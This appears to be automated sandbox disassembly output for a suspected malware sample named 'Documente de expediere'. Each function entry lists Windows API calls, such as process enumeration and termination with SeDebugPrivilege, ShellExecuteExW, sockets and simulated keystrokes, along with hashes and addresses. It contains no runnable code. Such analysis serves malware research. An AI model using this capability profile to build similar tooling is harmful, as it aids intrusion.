                                                • Instruction ID: c433cc73187ff11f0e1d04562aab9c79d37e891d263620a7bc86c7c45ff8a4f8
                                                • Opcode Fuzzy Hash: 56f5ce3d648e29cb66186a16302adae4ff5f033c966216973c4f1fde37b3459b
                                                • Instruction Fuzzy Hash: B701ACB5240348FFE610AB69DC49F9B3B6DEB89711F01C521FA05DB1D1CA759C009A24
                                                APIs
                                                  • Part of subcall function 006E7652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006E758C,80070057,?,?,?,006E799D), ref: 006E766F
                                                  • Part of subcall function 006E7652: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006E758C,80070057,?,?), ref: 006E768A
                                                  • Part of subcall function 006E7652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006E758C,80070057,?,?), ref: 006E7698
                                                  • Part of subcall function 006E7652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006E758C,80070057,?), ref: 006E76A8
                                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00709B1B
                                                • _memset.LIBCMT ref: 00709B28
                                                • _memset.LIBCMT ref: 00709C6B
                                                • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00709C97
                                                • CoTaskMemFree.OLE32(?), ref: 00709CA2
                                                Strings
                                                • NULL Pointer assignment, xrefs: 00709CF0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                • String ID: NULL Pointer assignment
                                                • API String ID: 1300414916-2785691316
                                                • Opcode ID: b2737a935a1717d7a9a3abf81843afa02aba4ed0fe31374cb16d79659c5d90d0
                                                • Instruction ID: a008327ab66c5b18f4033ba5c0a1fe820b81fb7a4129fe90dad1d1ae3d2c81a7
                                                • Opcode Fuzzy Hash: b2737a935a1717d7a9a3abf81843afa02aba4ed0fe31374cb16d79659c5d90d0
                                                • Instruction Fuzzy Hash: 05914971D00229EBDF10DFA5DC80ADEBBB9EF08310F208159F519A7291DB359A44CFA4
                                                APIs
                                                • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00717093
                                                • SendMessageW.USER32(?,00001036,00000000,?), ref: 007170A7
                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 007170C1
                                                • _wcscat.LIBCMT ref: 0071711C
                                                • SendMessageW.USER32(?,00001057,00000000,?), ref: 00717133
                                                • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00717161
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window_wcscat
                                                • String ID: SysListView32
                                                • API String ID: 307300125-78025650
                                                • Opcode ID: b175a793f7fab53b33c10a145f79330845448aa1ad896008fe25142cddfc3fa5
                                                • Instruction ID: f56c33c4b4e7c96ac5d50a3c05b1739dec8635213e98517ccb09b0d04d4ea8ba
                                                • Opcode Fuzzy Hash: b175a793f7fab53b33c10a145f79330845448aa1ad896008fe25142cddfc3fa5
                                                • Instruction Fuzzy Hash: 6741AF70A04308AFEB259F68CC85BEA77B9EF08350F10452AF944A71D2D67A9DC4CB64
                                                APIs
                                                  • Part of subcall function 006F3E91: CreateToolhelp32Snapshot.KERNEL32 ref: 006F3EB6
                                                  • Part of subcall function 006F3E91: Process32FirstW.KERNEL32(00000000,?), ref: 006F3EC4
                                                  • Part of subcall function 006F3E91: CloseHandle.KERNEL32(00000000), ref: 006F3F8E
                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0070ECB8
                                                • GetLastError.KERNEL32 ref: 0070ECCB
                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0070ECFA
                                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 0070ED77
                                                • GetLastError.KERNEL32(00000000), ref: 0070ED82
                                                • CloseHandle.KERNEL32(00000000), ref: 0070EDB7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                • String ID: SeDebugPrivilege
                                                • API String ID: 2533919879-2896544425
                                                • Opcode ID: 687bf375dc98c751077f591d36f64ad53c2e3e3bfa76aa95028a043841657667
                                                • Instruction ID: b87fe9a441dc68ecabeedfb15e6440c9146e28792a8977febbec41ff828a97f5
                                                • Opcode Fuzzy Hash: 687bf375dc98c751077f591d36f64ad53c2e3e3bfa76aa95028a043841657667
                                                • Instruction Fuzzy Hash: 6E41AC713042009FDB14EF28CC95F6EB7A6EF50714F08846DF9469B2D2DB79A804CB9A
                                                APIs
                                                • LoadIconW.USER32(00000000,00007F03), ref: 006F32C5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: IconLoad
                                                • String ID: blank$info$question$stop$warning
                                                • API String ID: 2457776203-404129466
                                                • Opcode ID: 2c073a48d4e1e258ef51275f1a619303aafc9d3f93b596089daa6b582918d692
                                                • Instruction ID: 0db803288b130474f762f77d012428a255e9868936332241b3855e540b5e0e0c
                                                • Opcode Fuzzy Hash: 2c073a48d4e1e258ef51275f1a619303aafc9d3f93b596089daa6b582918d692
                                                • Instruction Fuzzy Hash: E811EB7134836EBBA7115A58DC42CFAB39DEF19374F10002AF600563C1D7B55B8146A9
                                                APIs
                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 006F454E
                                                • LoadStringW.USER32(00000000), ref: 006F4555
                                                • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 006F456B
                                                • LoadStringW.USER32(00000000), ref: 006F4572
                                                • _wprintf.LIBCMT ref: 006F4598
                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 006F45B6
                                                Strings
                                                • %s (%d) : ==> %s: %s %s, xrefs: 006F4593
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: HandleLoadModuleString$Message_wprintf
                                                • String ID: %s (%d) : ==> %s: %s %s
                                                • API String ID: 3648134473-3128320259
                                                • Opcode ID: 4b054a6c1cc90707ec1eb615a322b4c3a28bde0e3af14b4708fc2b58461df2ca
                                                • Instruction ID: 7a27e4661ba331fffa4508f65516ad67c4754099f8e08ead37dcfff0370cc0de
                                                • Opcode Fuzzy Hash: 4b054a6c1cc90707ec1eb615a322b4c3a28bde0e3af14b4708fc2b58461df2ca
                                                • Instruction Fuzzy Hash: 83014FF290020CBFE750E7A49D89EF7776CDB08301F4085A6FB49D2191EA789E858B74
                                                APIs
                                                  • Part of subcall function 00692612: GetWindowLongW.USER32(?,000000EB), ref: 00692623
                                                • GetSystemMetrics.USER32(0000000F), ref: 0071D78A
                                                • GetSystemMetrics.USER32(0000000F), ref: 0071D7AA
                                                • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0071D9E5
                                                • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0071DA03
                                                • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0071DA24
                                                • ShowWindow.USER32(00000003,00000000), ref: 0071DA43
                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 0071DA68
                                                • DefDlgProcW.USER32(?,00000005,?,?), ref: 0071DA8B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                • String ID:
                                                • API String ID: 1211466189-0
                                                • Opcode ID: 43350ffa0be0cc6826dae4b8b57f21a4485e85ed0e88b4626258b01bcf17b64e
                                                • Instruction ID: c142a97ccd502ceeee9bc8964e2b76b8aa62acee642fc7a45aae7370890ad2d3
                                                • Opcode Fuzzy Hash: 43350ffa0be0cc6826dae4b8b57f21a4485e85ed0e88b4626258b01bcf17b64e
                                                • Instruction Fuzzy Hash: 87B15771600225ABDF28CF6DC9897E97BB2FF44711F08C169ED489A295D738AD90CF90
                                                APIs
                                                • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,006CC417,00000004,00000000,00000000,00000000), ref: 00692ACF
                                                • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,006CC417,00000004,00000000,00000000,00000000,000000FF), ref: 00692B17
                                                • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,006CC417,00000004,00000000,00000000,00000000), ref: 006CC46A
                                                • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,006CC417,00000004,00000000,00000000,00000000), ref: 006CC4D6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: ShowWindow
                                                • String ID:
                                                • API String ID: 1268545403-0
                                                • Opcode ID: 1f2dbbaf327d3864ad1d6c90225304acab987433cb3cee4f759704fa5b0f316b
                                                • Instruction ID: d96d53e843bf3dc48db80168042c143253a4f596bbd7a6f1aaec96c5646b43ec
                                                • Opcode Fuzzy Hash: 1f2dbbaf327d3864ad1d6c90225304acab987433cb3cee4f759704fa5b0f316b
                                                • Instruction Fuzzy Hash: 6041FB32608681BACF398B2C8CBCBFA7BDBEB55314F54C41DE04B46EA1C675A846D714
                                                APIs
                                                • InterlockedExchange.KERNEL32(?,000001F5), ref: 006F737F
                                                  • Part of subcall function 006B0FF6: std::exception::exception.LIBCMT ref: 006B102C
                                                  • Part of subcall function 006B0FF6: __CxxThrowException@8.LIBCMT ref: 006B1041
                                                • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 006F73B6
                                                • EnterCriticalSection.KERNEL32(?), ref: 006F73D2
                                                • _memmove.LIBCMT ref: 006F7420
                                                • _memmove.LIBCMT ref: 006F743D
                                                • LeaveCriticalSection.KERNEL32(?), ref: 006F744C
                                                • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 006F7461
                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 006F7480
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                • String ID:
                                                • API String ID: 256516436-0
                                                • Opcode ID: 2f5c8815601ad0ad2e0be460ffea0144f7abd4454e26ccfceabf69295ee29070
                                                • Instruction ID: c519dd08c6a08bbc05f6ca8555fb0863fe1962b75f5f4719ab7c0f18eb01e125
                                                • Opcode Fuzzy Hash: 2f5c8815601ad0ad2e0be460ffea0144f7abd4454e26ccfceabf69295ee29070
                                                • Instruction Fuzzy Hash: A931B271900109EBDF10EF58DC85AEF7BB9FF45310B1481A9FD04AB286DB309A50CBA8
                                                APIs
                                                • DeleteObject.GDI32(00000000), ref: 0071645A
                                                • GetDC.USER32(00000000), ref: 00716462
                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0071646D
                                                • ReleaseDC.USER32(00000000,00000000), ref: 00716479
                                                • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 007164B5
                                                • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 007164C6
                                                • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00719299,?,?,000000FF,00000000,?,000000FF,?), ref: 00716500
                                                • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00716520
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                • String ID:
                                                • API String ID: 3864802216-0
                                                • Opcode ID: 9e8e0a9a40312240073101de2a81793e716a48cdc23550106004ec9fbbb4a519
                                                • Instruction ID: 338811e5795eeb472b40ae44da38a8420f21f722f67ce222199d31025734bc98
                                                • Opcode Fuzzy Hash: 9e8e0a9a40312240073101de2a81793e716a48cdc23550106004ec9fbbb4a519
                                                • Instruction Fuzzy Hash: 80316D72201214BFEB118F58DC4AFEA3FAAEF09761F048065FE089A1D1D6799851CB74
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: _memcmp
                                                • String ID:
                                                • API String ID: 2931989736-0
                                                • Opcode ID: c8ccc19926849e301383da79feeef370825d7497a73a2476860e1153c1edb89a
                                                • Instruction ID: 04fbe7c9a3581ce9357f49e477ac275297649b7dc3048dc8e35f527f57b49ccb
                                                • Opcode Fuzzy Hash: c8ccc19926849e301383da79feeef370825d7497a73a2476860e1153c1edb89a
                                                • Instruction Fuzzy Hash: 5C21F5F1702355BBDA50A6229C52FEF239FAF513B4B440024FD059A383F716DE5382A9
APIs
  • Part of subcall function 00699997: __itow.LIBCMT ref: 006999C2
  • Part of subcall function 00699997: __swprintf.LIBCMT ref: 00699A0C
  • Part of subcall function 006AFEC6: _wcscpy.LIBCMT ref: 006AFEE9
• _wcstok.LIBCMT ref: 006FEEFF
• _wcscpy.LIBCMT ref: 006FEF8E
• _memset.LIBCMT ref: 006FEFC1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
• Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
Similarity
• API ID: _wcscpy$__itow__swprintf_memset_wcstok
• String ID: X
• API String ID: 774024439-3081909835
• Opcode ID: cd6c8d13a25a4f1f4fd219b5d0fd8ada318fb02c6ab8bd5864982d11945f1cb1
• Instruction ID: c406997ec0e88ad39cc02dd61b9b5ca443b38a3f8b1b0c9fd924a5afd558b156
• Opcode Fuzzy Hash: cd6c8d13a25a4f1f4fd219b5d0fd8ada318fb02c6ab8bd5864982d11945f1cb1
• Instruction Fuzzy Hash: 49C18271508300DFCB64EF28C881AAAB7E6BF84314F04496DF599976A2DB30ED45CB96
APIs
• __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00706F14
• #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00706F35
• WSAGetLastError.WSOCK32(00000000), ref: 00706F48
• htons.WSOCK32(?,?,?,00000000,?), ref: 00706FFE
• inet_ntoa.WSOCK32(?), ref: 00706FBB
  • Part of subcall function 006EAE14: _strlen.LIBCMT ref: 006EAE1E
  • Part of subcall function 006EAE14: _memmove.LIBCMT ref: 006EAE40
• _strlen.LIBCMT ref: 00707058
• _memmove.LIBCMT ref: 007070C1
Memory Dump Source
• Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
• Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
Similarity
• API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
• String ID:
• API String ID: 3619996494-0
• Opcode ID: fbc669dfc1761243f849e0de381b611b7402e3c8d1f1d7945d6e11a54a70df9b
• Instruction ID: 5df2b8cf6fd85b2e410be12912c487ec41a298e7cc335ce15eb8e5028d4cac9e
• Opcode Fuzzy Hash: fbc669dfc1761243f849e0de381b611b7402e3c8d1f1d7945d6e11a54a70df9b
• Instruction Fuzzy Hash: 9D81E171508300EFDB54EB28CC91E6BB3EEAF84714F108A1CF5559B2E2DA75AD00C7A6
Memory Dump Source
• Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
• Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5f653b509693a2cb5d0fa496382eebd522f91e22c8092777ae7b750619e0765d
• Instruction ID: ac794b07603972e4012d72f6f11cb21b155afdd3c2534215c848c3b3de8f6b8f
• Opcode Fuzzy Hash: 5f653b509693a2cb5d0fa496382eebd522f91e22c8092777ae7b750619e0765d
• Instruction Fuzzy Hash: 40715D7090050AEFCF049F58CC45EFEBBBAFF8A314F248159F915AA251C734AA51CB64
APIs
• IsWindow.USER32(01654CF0), ref: 0071B6A5
• IsWindowEnabled.USER32(01654CF0), ref: 0071B6B1
• SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0071B795
• SendMessageW.USER32(01654CF0,000000B0,?,?), ref: 0071B7CC
• IsDlgButtonChecked.USER32(?,?), ref: 0071B809
• GetWindowLongW.USER32(01654CF0,000000EC), ref: 0071B82B
• SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0071B843
Memory Dump Source
• Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
• Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
Similarity
• API ID: MessageSendWindow$ButtonCheckedEnabledLong
• String ID:
• API String ID: 4072528602-0
• Opcode ID: 91db5240ff38b74b67b22eda0c9ac17ca08472528153cfe91d45360ba45b6ad0
• Instruction ID: 3504cb5b2ee3b14527eea1f4f81368f40221b2b985462f896403f7d4af093bbc
• Opcode Fuzzy Hash: 91db5240ff38b74b67b22eda0c9ac17ca08472528153cfe91d45360ba45b6ad0
• Instruction Fuzzy Hash: D7718C34600304EFDB209F68C8D5FEA7BB9EF59300F1484AAE955972E1C739AD81CB54
APIs
• _memset.LIBCMT ref: 0070F75C
• _memset.LIBCMT ref: 0070F825
• ShellExecuteExW.SHELL32(?), ref: 0070F86A
  • Part of subcall function 00699997: __itow.LIBCMT ref: 006999C2
  • Part of subcall function 00699997: __swprintf.LIBCMT ref: 00699A0C
  • Part of subcall function 006AFEC6: _wcscpy.LIBCMT ref: 006AFEE9
• GetProcessId.KERNEL32(00000000), ref: 0070F8E1
• CloseHandle.KERNEL32(00000000), ref: 0070F910
Strings
Memory Dump Source
• Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
• Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
Similarity
• API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
• String ID: @
• API String ID: 3522835683-2766056989
• Opcode ID: f995cf99ff89f2594fb45bec30fc7cd10d79a85429d8abb40b05911cc2f5df16
• Instruction ID: 9cb5af9e2cbd2181e770cd49c246974ab15c4615e53dff60534c2d3a7b49ee1f
• Opcode Fuzzy Hash: f995cf99ff89f2594fb45bec30fc7cd10d79a85429d8abb40b05911cc2f5df16
• Instruction Fuzzy Hash: 7A61AF75A00619DFCF14EF58C4809AEBBFAFF48310B14856DE846AB791CB34AD41CB98
APIs
• GetParent.USER32(?), ref: 006F149C
• GetKeyboardState.USER32(?), ref: 006F14B1
• SetKeyboardState.USER32(?), ref: 006F1512
• PostMessageW.USER32(?,00000101,00000010,?), ref: 006F1540
• PostMessageW.USER32(?,00000101,00000011,?), ref: 006F155F
• PostMessageW.USER32(?,00000101,00000012,?), ref: 006F15A5
• PostMessageW.USER32(?,00000101,0000005B,?), ref: 006F15C8
Memory Dump Source
• Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
• Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
• Opcode ID: 70c4a29a2f075291bd33db9735724482b3a8b0e6b0eeef1d0e116180a5dafa2d
• Instruction ID: 89fc63289efdde26ce056dfada3e92be6765fa857819410581e56f236ba50988
• Opcode Fuzzy Hash: 70c4a29a2f075291bd33db9735724482b3a8b0e6b0eeef1d0e116180a5dafa2d
